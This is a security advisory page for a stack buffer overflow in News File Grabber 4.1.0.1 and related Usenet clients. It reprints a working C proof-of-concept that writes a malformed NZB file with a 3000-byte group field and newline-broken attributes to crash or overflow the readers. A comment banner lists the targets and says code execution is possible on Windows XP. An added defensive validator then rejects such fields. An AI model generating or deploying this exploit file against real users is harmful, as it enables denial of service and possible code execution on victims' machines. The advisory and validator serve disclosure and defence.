News File Grabber 4.1.0.1 Subject Line Stack Buffer Overflow Vulnerability (2)

01 Jul 2014 00:00:00, reported by RootType, via seebug (www.seebug.org)

News File Grabber 4.1.0.1 remote stack-based buffer-overflow vulnerability

Code

Source: http://www.securityfocus.com/bid/22617/info
 
News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
 
Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application.
 
This issue affects version 4.1.0.1; other versions may also be affected. 

/*********************************************************************************************\
*
*                              NZB Generic 0Day DoS Exploit
*    Proofs of Concept for News File Grabber, NewsBin, Grabit, NewsReactor and News Rover
*
*
* Bugs in News Rover <=12.1 Rev 1:
* There's a stack overflow in RoverNZB triggered by files that contain a long subject.
* There's a stack overflow in NewsRover triggered by files that contain a long group.
* To trigger: run file.nzb
* Impact: Code execution on Windows XP, SP1 and SP2
*
* Bug in News File Grabber 4.1.0.1:
* If the subject field contains a new line, the app will try to exec data in memory. But
* since the address changed every time the app runs it's very hard to exploit. However I
* sometimes got EIP overwritten by my chars
* To trigger: load file.nzb and start download. CPU -> 100% and then Out of Memory error.
* Impact: Code execution on Windows XP, SP1 and SP2
*
* Bug in Grabit 1.5.3:
* Grabit does not correctly handle fields that contain a semicolon.
* To trigger: Just grab the file
* Impact: DoS
* Note: Grabit 1.6 is not affected.
*
* Bug in NewsReactor:
* There's a heap overflow that occurs when group field is too long.
* To trigger: load file.nzb, click grab. After a few tries to get the file it crashes.
* Impact: Code execution on Windows XP, SP1 and DoS on SP2
*
* Bug in NewsBin Pro 4.3.2:
* There's a heap overflow that occurs when group field is too long.
* To trigger: load file.nzb, and start download. The app should then be unstable.
* Impact: Code execution on Windows XP, SP1 and DoS on SP2
*
* Bug in NewsBin Pro 5.33 (maybe others...):
* There's a heap overflow that occurs when group field is too long.
* To trigger: load file.nzb, and start download. Then click "Delete All Posts". Boom!
* Impact: Code execution on Windows XP, SP1 and DoS on SP2
* Note: Maybe it's possible to exec code on SP2, but there is a lot of bad chars and with the
* stack protection I didn't find a way to jump to a good return address.
*
* Solution: Buy your dvds leecha!!!
*
*
* Coded and discovered by Marsu <[email protected]>
* Note: thanks to the Bananas and to KryptonIT. Good luck to the inuITs :P
*
\*********************************************************************************************/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* XML prologue and opening <nzb> element written before the malformed <file> */
char nzbheader[]="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n"
                 "<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" \"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n"
                 "<!-- NZB Generated by MarsupilamiPowa -->\n"
                 "<nzb xmlns=\"[email protected]\">\n\n";

/* closing tags that complete the document */
char nzbend[]="</segment>\n"
              "</segments>\n"
              "</file>\n"
              "</nzb>\n";

int main(int argc, char* argv[]) {

FILE *file;
char *pad;

printf("MarsupilamiPowa's Generic NZB DoS Exploit\n");

file=fopen("file.nzb","wb");
if (file == NULL) {
    perror("fopen");
    return 1;
}

fputs(nzbheader, file);
/* poster attribute broken by a newline, subject attribute preceded by a newline */
fputs("<file poster=\"Marsu\n", file);
fputs("\" date=\"1170609233\"\nsubject=\"hello bug", file);
fputs("\">\n", file);
fputs("<groups><group>", file);

/* 3000-byte group name; the buffer is NUL-terminated here, the original passed
   an unterminated buffer to fprintf() as its format string */
pad = (char*)malloc(3001);
if (pad == NULL) {
    perror("malloc");
    fclose(file);
    return 1;
}
memset(pad,'A',3000);
pad[3000] = '\0';
fputs(pad, file);
free(pad);
fputs("</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">", file);
fputs("\n;\n", file);   /* lone semicolon in a field, the Grabit 1.5.3 case */
fputs(nzbend, file);
fclose(file);

printf("file.nzb generated! Have fun\n");
return 0;

}
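As an added example from the defender's side (not part of the advisory or of Marsu's PoC), the following C pre-check rejects an NZB document before it reaches a fixed-size parser buffer whenever a <group> value or subject attribute is unterminated, over-long, or embeds a newline, the malformed inputs the banner describes. The limits NZB_MAX_GROUP and NZB_MAX_SUBJECT and all function names are assumptions; check_group_of_length builds a constructed document carrying the PoC's 3000-byte 'A' padding so the rejection can be seen end to end.

```c
#include <stdio.h>
#include <string.h>
/* Assumed limits: an NNTP line (RFC 3977) is at most 512 bytes, so a group name
   or subject longer than this is never legitimate and is rejected up front. */
#define NZB_MAX_GROUP   256
#define NZB_MAX_SUBJECT 512

/* 1 if every open..close value is terminated, <= maxlen bytes and newline-free. */
static int check_values(const char *doc, const char *open, const char *close,
                        size_t maxlen)
{
    const char *p = doc, *start, *end;
    while ((p = strstr(p, open)) != NULL) {
        start = p + strlen(open);
        if ((end = strstr(start, close)) == NULL ||
            (size_t)(end - start) > maxlen ||
            memchr(start, '\n', (size_t)(end - start)) != NULL)
            return 0;            /* unterminated, oversized or embedded newline */
        p = end;
    }
    return 1;
}

/* Validate the <group> elements and subject="" attributes of an NZB document. */
int nzb_fields_ok(const char *doc)
{
    return check_values(doc, "<group>", "</group>", NZB_MAX_GROUP)
        && check_values(doc, "subject=\"", "\"", NZB_MAX_SUBJECT);
}

/* Constructed NZB whose <group> is n bytes of 'A' (the PoC's padding pattern);
   returns the check result, or -1 if n does not fit the scratch buffer. */
int check_group_of_length(size_t n)
{
    static char doc[8192];
    const char *head = "<nzb><file subject=\"ok\"><groups><group>";
    const char *tail = "</group></groups></file></nzb>";
    if (n + strlen(head) + strlen(tail) >= sizeof(doc))
        return -1;
    memcpy(doc, head, strlen(head));
    memset(doc + strlen(head), 'A', n);
    strcpy(doc + strlen(head) + n, tail);
    return nzb_fields_ok(doc);
}

int main(void)
{
    printf("3000-byte group accepted? %d\n", check_group_of_length(3000));
    return 0;
}
```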
